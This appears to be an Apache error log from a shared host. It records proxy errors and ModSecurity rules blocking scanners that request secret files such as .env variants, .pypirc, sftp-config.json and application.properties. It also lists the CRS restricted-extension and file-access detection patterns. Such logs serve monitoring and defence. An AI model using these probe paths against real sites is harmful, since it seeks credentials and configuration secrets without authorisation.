[Mon May 11 12:01:21.984074 2026] [proxy_http:error] [pid 1254179:tid 1254195] (20014)Internal error (specific information not available): [client 5.255.124.170:52362] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:21.984291 2026] [proxy:error] [pid 1254179:tid 1254195] [client 5.255.124.170:52362] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/
[Mon May 11 12:01:21.984896 2026] [proxy_http:error] [pid 1256241:tid 1256246] (20014)Internal error (specific information not available): [client 5.255.124.170:52340] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:21.984918 2026] [proxy:error] [pid 1256241:tid 1256246] [client 5.255.124.170:52340] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/
[Mon May 11 12:01:21.986965 2026] [proxy_http:error] [pid 1254242:tid 1254252] (20014)Internal error (specific information not available): [client 5.255.124.170:52344] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:21.987216 2026] [proxy:error] [pid 1254242:tid 1254252] [client 5.255.124.170:52344] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/
[Mon May 11 12:01:21.989703 2026] [proxy_http:error] [pid 1254328:tid 1254340] (20014)Internal error (specific information not available): [client 5.255.124.170:52264] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:21.990027 2026] [proxy:error] [pid 1254328:tid 1254340] [client 5.255.124.170:52264] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/
[Mon May 11 12:01:21.993971 2026] [proxy_http:error] [pid 1254133:tid 1254157] (20014)Internal error (specific information not available): [client 5.255.124.170:52374] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:21.994699 2026] [proxy:error] [pid 1254133:tid 1254157] [client 5.255.124.170:52374] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/
[Mon May 11 12:01:22.010082 2026] [proxy_http:error] [pid 1254328:tid 1254340] (20014)Internal error (specific information not available): [client 5.255.124.170:52264] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:22.010106 2026] [proxy:error] [pid 1254328:tid 1254340] [client 5.255.124.170:52264] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/502.shtml
[Mon May 11 12:01:33.244133 2026] [security2:error] [pid 1254179:tid 1254204] [client 185.177.72.9:53026] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env.dist2023"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/database/.env.dist2023"] [unique_id "agGo_WS6k_SCYd1AVZqxdgAAARc"]
[Mon May 11 12:01:33.244354 2026] [security2:error] [pid 1254179:tid 1254204] [client 185.177.72.9:53026] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/database/.env.dist2023"] [unique_id "agGo_WS6k_SCYd1AVZqxdgAAARc"]
[Mon May 11 12:01:34.606529 2026] [security2:error] [pid 1254179:tid 1254204] [client 185.177.72.9:53026] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGo_WS6k_SCYd1AVZqxdgAAARc"]
[Mon May 11 12:01:34.632464 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:53030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env.dist2023"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/database/.env.dist2023"] [unique_id "agGo_mS6k_SCYd1AVZqxdwAAAQ8"]
[Mon May 11 12:01:34.632679 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:53030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/database/.env.dist2023"] [unique_id "agGo_mS6k_SCYd1AVZqxdwAAAQ8"]
[Mon May 11 12:01:35.828267 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:53030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGo_mS6k_SCYd1AVZqxdwAAAQ8"]
[Mon May 11 12:01:47.979548 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:3666] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/deployment/Gemfile.old"] [unique_id "agGpC2S6k_SCYd1AVZqxigAAAQM"]
[Mon May 11 12:01:47.979983 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:3666] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/deployment/Gemfile.old"] [unique_id "agGpC2S6k_SCYd1AVZqxigAAAQM"]
[Mon May 11 12:01:49.153311 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:3666] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpC2S6k_SCYd1AVZqxigAAAQM"]
[Mon May 11 12:01:49.179851 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:3682] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/deployment/Gemfile.old"] [unique_id "agGpDWS6k_SCYd1AVZqxjQAAAQQ"]
[Mon May 11 12:01:49.180310 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:3682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/deployment/Gemfile.old"] [unique_id "agGpDWS6k_SCYd1AVZqxjQAAAQQ"]
[Mon May 11 12:01:50.398409 2026] [security2:error] [pid 1254179:tid 1254185] [client 185.177.72.9:3682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpDWS6k_SCYd1AVZqxjQAAAQQ"]
[Mon May 11 12:01:59.857983 2026] [proxy_http:error] [pid 1254242:tid 1254249] (20014)Internal error (specific information not available): [client 5.255.124.170:40744] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:59.858009 2026] [proxy:error] [pid 1254242:tid 1254249] [client 5.255.124.170:40744] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/.pypirc
[Mon May 11 12:01:59.860059 2026] [proxy_http:error] [pid 1254328:tid 1254343] (20014)Internal error (specific information not available): [client 5.255.124.170:40712] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:59.860083 2026] [proxy:error] [pid 1254328:tid 1254343] [client 5.255.124.170:40712] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/backend/.env
[Mon May 11 12:01:59.874376 2026] [proxy_http:error] [pid 1254212:tid 1254225] (20014)Internal error (specific information not available): [client 5.255.124.170:40584] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:59.874403 2026] [proxy:error] [pid 1254212:tid 1254225] [client 5.255.124.170:40584] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/.env
[Mon May 11 12:01:59.876808 2026] [proxy_http:error] [pid 1254133:tid 1254138] (20014)Internal error (specific information not available): [client 5.255.124.170:40632] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:59.876830 2026] [proxy:error] [pid 1254133:tid 1254138] [client 5.255.124.170:40632] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/.env.backup
[Mon May 11 12:01:59.884852 2026] [proxy_http:error] [pid 1254179:tid 1254183] (20014)Internal error (specific information not available): [client 5.255.124.170:40704] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:59.884875 2026] [proxy:error] [pid 1254179:tid 1254183] [client 5.255.124.170:40704] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/admin/.env
[Mon May 11 12:01:59.886393 2026] [proxy_http:error] [pid 1256241:tid 1256247] (20014)Internal error (specific information not available): [client 5.255.124.170:40556] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:59.886640 2026] [proxy:error] [pid 1256241:tid 1256247] [client 5.255.124.170:40556] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/application.properties
[Mon May 11 12:01:59.888764 2026] [proxy_http:error] [pid 1254212:tid 1254225] (20014)Internal error (specific information not available): [client 5.255.124.170:40584] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:59.888785 2026] [proxy:error] [pid 1254212:tid 1254225] [client 5.255.124.170:40584] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/502.shtml
[Mon May 11 12:01:59.906542 2026] [proxy_http:error] [pid 1254242:tid 1254264] (20014)Internal error (specific information not available): [client 5.255.124.170:40558] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:59.906574 2026] [proxy:error] [pid 1254242:tid 1254264] [client 5.255.124.170:40558] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/config/application.properties
[Mon May 11 12:02:04.753038 2026] [proxy_http:error] [pid 1254133:tid 1254143] (20014)Internal error (specific information not available): [client 5.255.124.170:40726] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:02:04.753829 2026] [proxy_http:error] [pid 1256241:tid 1256247] (20014)Internal error (specific information not available): [client 5.255.124.170:40556] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:02:04.756132 2026] [proxy_http:error] [pid 1254328:tid 1254344] (20014)Internal error (specific information not available): [client 5.255.124.170:40696] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:02:04.757812 2026] [proxy_http:error] [pid 1254242:tid 1254249] (20014)Internal error (specific information not available): [client 5.255.124.170:40744] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:02:04.754800 2026] [proxy_http:error] [pid 1254179:tid 1254187] (20014)Internal error (specific information not available): [client 5.255.124.170:40748] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:02:04.768268 2026] [proxy_http:error] [pid 1254328:tid 1254347] (20014)Internal error (specific information not available): [client 5.255.124.170:40604] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:02:04.780859 2026] [proxy_http:error] [pid 1256241:tid 1256248] (20014)Internal error (specific information not available): [client 5.255.124.170:40538] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:02:05.509098 2026] [proxy_http:error] [pid 1254179:tid 1254188] (20014)Internal error (specific information not available): [client 5.255.124.170:39896] AH01102: error reading status line from remote server 127.0.0.1:2095, referer: http://webmail.labaujue.com/health
[Mon May 11 12:02:05.511548 2026] [proxy_http:error] [pid 1254242:tid 1254261] (20014)Internal error (specific information not available): [client 5.255.124.170:39996] AH01102: error reading status line from remote server 127.0.0.1:2095, referer: http://webmail.labaujue.com/__env.js
[Mon May 11 12:02:05.516050 2026] [proxy_http:error] [pid 1254133:tid 1254157] (20014)Internal error (specific information not available): [client 5.255.124.170:39976] AH01102: error reading status line from remote server 127.0.0.1:2095, referer: http://webmail.labaujue.com/api/v1/config
[Mon May 11 12:02:05.516739 2026] [proxy_http:error] [pid 1254212:tid 1254237] (20014)Internal error (specific information not available): [client 5.255.124.170:39988] AH01102: error reading status line from remote server 127.0.0.1:2095, referer: http://webmail.labaujue.com/app-config.json
[Mon May 11 12:02:05.596589 2026] [proxy_http:error] [pid 1254133:tid 1254139] (20014)Internal error (specific information not available): [client 5.255.124.170:40526] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:02:06.536222 2026] [proxy_http:error] [pid 1254179:tid 1254195] (20014)Internal error (specific information not available): [client 5.255.124.170:40052] AH01102: error reading status line from remote server 127.0.0.1:2095, referer: http://webmail.labaujue.com/health
[Mon May 11 12:02:07.425730 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:29536] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env.live2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/development/.env.live2024"] [unique_id "agGpH2S6k_SCYd1AVZqxsgAAAQM"]
[Mon May 11 12:02:07.425943 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:29536] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/development/.env.live2024"] [unique_id "agGpH2S6k_SCYd1AVZqxsgAAAQM"]
[Mon May 11 12:02:08.605626 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:29536] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpH2S6k_SCYd1AVZqxsgAAAQM"]
[Mon May 11 12:02:08.632440 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:29544] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env.live2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/development/.env.live2024"] [unique_id "agGpIEYQeUtAPynIs6xb5gAAAAE"]
[Mon May 11 12:02:08.632638 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:29544] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/development/.env.live2024"] [unique_id "agGpIEYQeUtAPynIs6xb5gAAAAE"]
[Mon May 11 12:02:09.652931 2026] [ssl:error] [pid 1254242:tid 1254254] (EAI 2)Name or service not known: [client 89.3.30.33:58143] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 12:02:09.652968 2026] [ssl:error] [pid 1254242:tid 1254254] AH01941: stapling_renew_response: responder error
[Mon May 11 12:02:09.859762 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:29544] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpIEYQeUtAPynIs6xb5gAAAAE"]
[Mon May 11 12:02:09.886176 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:29552] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /development/sftp-config.json.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/development/sftp-config.json.archived"] [unique_id "agGpIZkIEwRJMyDaV55RRAAAAU4"]
[Mon May 11 12:02:09.886389 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:29552] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/development/sftp-config.json.archived"] [unique_id "agGpIZkIEwRJMyDaV55RRAAAAU4"]
[Mon May 11 12:02:11.050914 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:29552] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpIZkIEwRJMyDaV55RRAAAAU4"]
[Mon May 11 12:02:11.080133 2026] [security2:error] [pid 1254133:tid 1254135] [client 185.177.72.9:29564] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /development/sftp-config.json.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/development/sftp-config.json.archived"] [unique_id "agGpIxjZymfuKpjWXeiAYAAAAMA"]
[Mon May 11 12:02:11.080652 2026] [security2:error] [pid 1254133:tid 1254135] [client 185.177.72.9:29564] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/development/sftp-config.json.archived"] [unique_id "agGpIxjZymfuKpjWXeiAYAAAAMA"]
[Mon May 11 12:02:13.285006 2026] [security2:error] [pid 1254133:tid 1254135] [client 185.177.72.9:29564] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpIxjZymfuKpjWXeiAYAAAAMA"]
[Mon May 11 12:02:13.311952 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:7238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /digitalocean/.env.production2023"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/digitalocean/.env.production2023"] [unique_id "agGpJWS6k_SCYd1AVZqxuAAAAQg"]
[Mon May 11 12:02:13.312176 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:7238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/digitalocean/.env.production2023"] [unique_id "agGpJWS6k_SCYd1AVZqxuAAAAQg"]
